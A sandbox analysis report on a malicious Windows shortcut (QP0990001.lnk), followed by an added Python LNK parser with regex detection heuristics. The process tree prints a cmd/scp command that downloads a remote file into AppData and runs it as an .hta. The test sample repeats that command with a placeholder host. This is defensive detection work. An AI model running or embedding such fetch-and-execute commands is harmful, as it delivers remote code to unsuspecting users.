Analysis
-
max time kernel
122s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64 arch:x86 image:win7-20230831-en locale:en-us os:windows7-x64 system -
submitted
03-10-2023 09:57
Static task
static1
Behavioral task
behavioral1
Sample
QP0990001.lnk
Resource
win7-20230831-en
windows7-x64
2 signatures
150 seconds
Behavioral task
behavioral2
Sample
QP0990001.lnk
Resource
win10v2004-20230915-en
windows10-2004-x64
19 signatures
150 seconds
General
-
Target
QP0990001.lnk
-
Size
2KB
-
MD5
c23a4b2e392af2535198428aafcbc7a4
-
SHA1
02a472fb5f6be33044c51420b6fa98fe3adf6251
-
SHA256
81b9e6ecd9d94421b7bef50c53e109e15927b3fdfb5068f51a742b662a7deaad
-
SHA512
17172ade2ef629d2b878635015a6bcbc73464737b51fc7312b1b6ffc76ea238a568bae3f479c8e2f5ef775404681d731c8217cdb6249fad8a5db98902ea00747
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes (cmd.exe):
description                          pid   process  target process
PID 2972 wrote to memory of 2220     2972  cmd.exe  cmd.exe
PID 2972 wrote to memory of 2220     2972  cmd.exe  cmd.exe
PID 2972 wrote to memory of 2220     2972  cmd.exe  cmd.exe
Processes
-
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\QP0990001.lnk
- Suspicious use of WriteProcessMemory
PID:2972 -
  C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "scp -o StrictHostKeyChecking=no [email protected]:/aa/DZZ C:\Users\Admin\AppData\Roaming\eeMT.hta" & C:\Users\Admin\AppData\Roaming\eeMT.hta
  PID:2220
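The process tree above is the whole story of this shortcut: its target is cmd.exe, whose argument string tells scp to accept any host key (StrictHostKeyChecking=no), copy a remote file into the user's roaming profile under a .hta name, and then, via the trailing &, hand that file to mshta through the .hta file association. All of that is recoverable statically from the LNK's StringData section, so a triage step that parses the shortcut and scores the argument string catches it before detonation. The following parser and heuristics are an added example, not tooling from the report or from the sandbox vendor; the sample shortcut is constructed in memory, and its scp source host (user@203.0.113.10) is a placeholder because the page does not preserve the real one. The field layout follows MS-SHLLINK (header, optional LinkTargetIDList and LinkInfo, then the string fields in fixed order).

```python
"""Triage a Windows shortcut (.lnk): pull the target's command line out of the
MS-SHLLINK StringData section and flag the scp-to-%APPDATA%-then-run-.hta chain
seen in this report. Added example; not tooling from the report."""
import re
import struct
import uuid

# MS-SHLLINK 2.1.1 LinkFlags
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

HEADER_SIZE = 0x4C
LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")

# StringData fields, in the on-disk order they appear when their flag is set
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

# Heuristics matching the behaviour in the report's process tree
SUSPICIOUS = (
    ("scp_without_hostkey_check",
     re.compile(r"\bscp\b.*StrictHostKeyChecking\s*=\s*no", re.I)),
    ("hta_dropped_in_appdata",
     re.compile(r"\\AppData\\(Roaming|Local)\\[^\s\"]+\.hta\b", re.I)),
    ("fetch_then_execute",
     re.compile(r"&\s*\S*\.hta\b", re.I)),
)


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a shell link, keyed by field name."""
    if len(data) < HEADER_SIZE:
        raise ValueError("too short to be a shell link")
    header_size, clsid = struct.unpack_from("<I16s", data, 0)
    if header_size != HEADER_SIZE or uuid.UUID(bytes_le=clsid) != LNK_CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize + ItemIDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize counts itself
        off += struct.unpack_from("<I", data, off)[0]
    fields = {}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]   # CountCharacters
        off += 2
        if flags & IS_UNICODE:
            fields[name] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            fields[name] = data[off:off + count].decode("cp1252")
            off += count
    return fields


def triage(fields: dict) -> list:
    """Names of the heuristics that fire on the shortcut's argument string."""
    args = fields.get("arguments", "")
    return [name for name, rx in SUSPICIOUS if rx.search(args)]


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Assemble a minimal Unicode shell link carrying only RelativePath and
    Arguments, so the parser can be exercised without a file on disk."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack(
        "<I16sIIQQQIIIHHII",
        HEADER_SIZE, LNK_CLSID.bytes_le, flags,
        0x20,        # FileAttributes: FILE_ATTRIBUTE_ARCHIVE
        0, 0, 0,     # Creation/Access/Write FILETIME
        0, 0,        # FileSize, IconIndex
        1,           # ShowCommand: SW_SHOWNORMAL
        0, 0, 0, 0,  # HotKey, Reserved1, Reserved2, Reserved3
    )
    strings = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                       for s in (relative_path, arguments))
    return header + strings


# Constructed sample, not the QP0990001.lnk from the report: the scp source host
# (user@203.0.113.10) is a placeholder; the rest mirrors the observed command line.
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\cmd.exe",
    r'/c "scp -o StrictHostKeyChecking=no user@203.0.113.10:/aa/DZZ '
    r'C:\Users\Admin\AppData\Roaming\eeMT.hta" & C:\Users\Admin\AppData\Roaming\eeMT.hta',
)

if __name__ == "__main__":
    fields = parse_lnk(SAMPLE_LNK)
    print("target:", fields["relative_path"])
    print("args:  ", fields["arguments"])
    print("hits:  ", triage(fields))
```

Run it against a real shortcut with `parse_lnk(open(path, "rb").read())`; a shortcut that carries a LinkTargetIDList or LinkInfo block is skipped over by size, so the same string walk applies. The three heuristics fire independently, which is what you want in a report like this one: a missing scp binary or an unreachable host leaves the sandbox with only the cmd.exe spawn and a low score, but the intent is fully visible in the argument string.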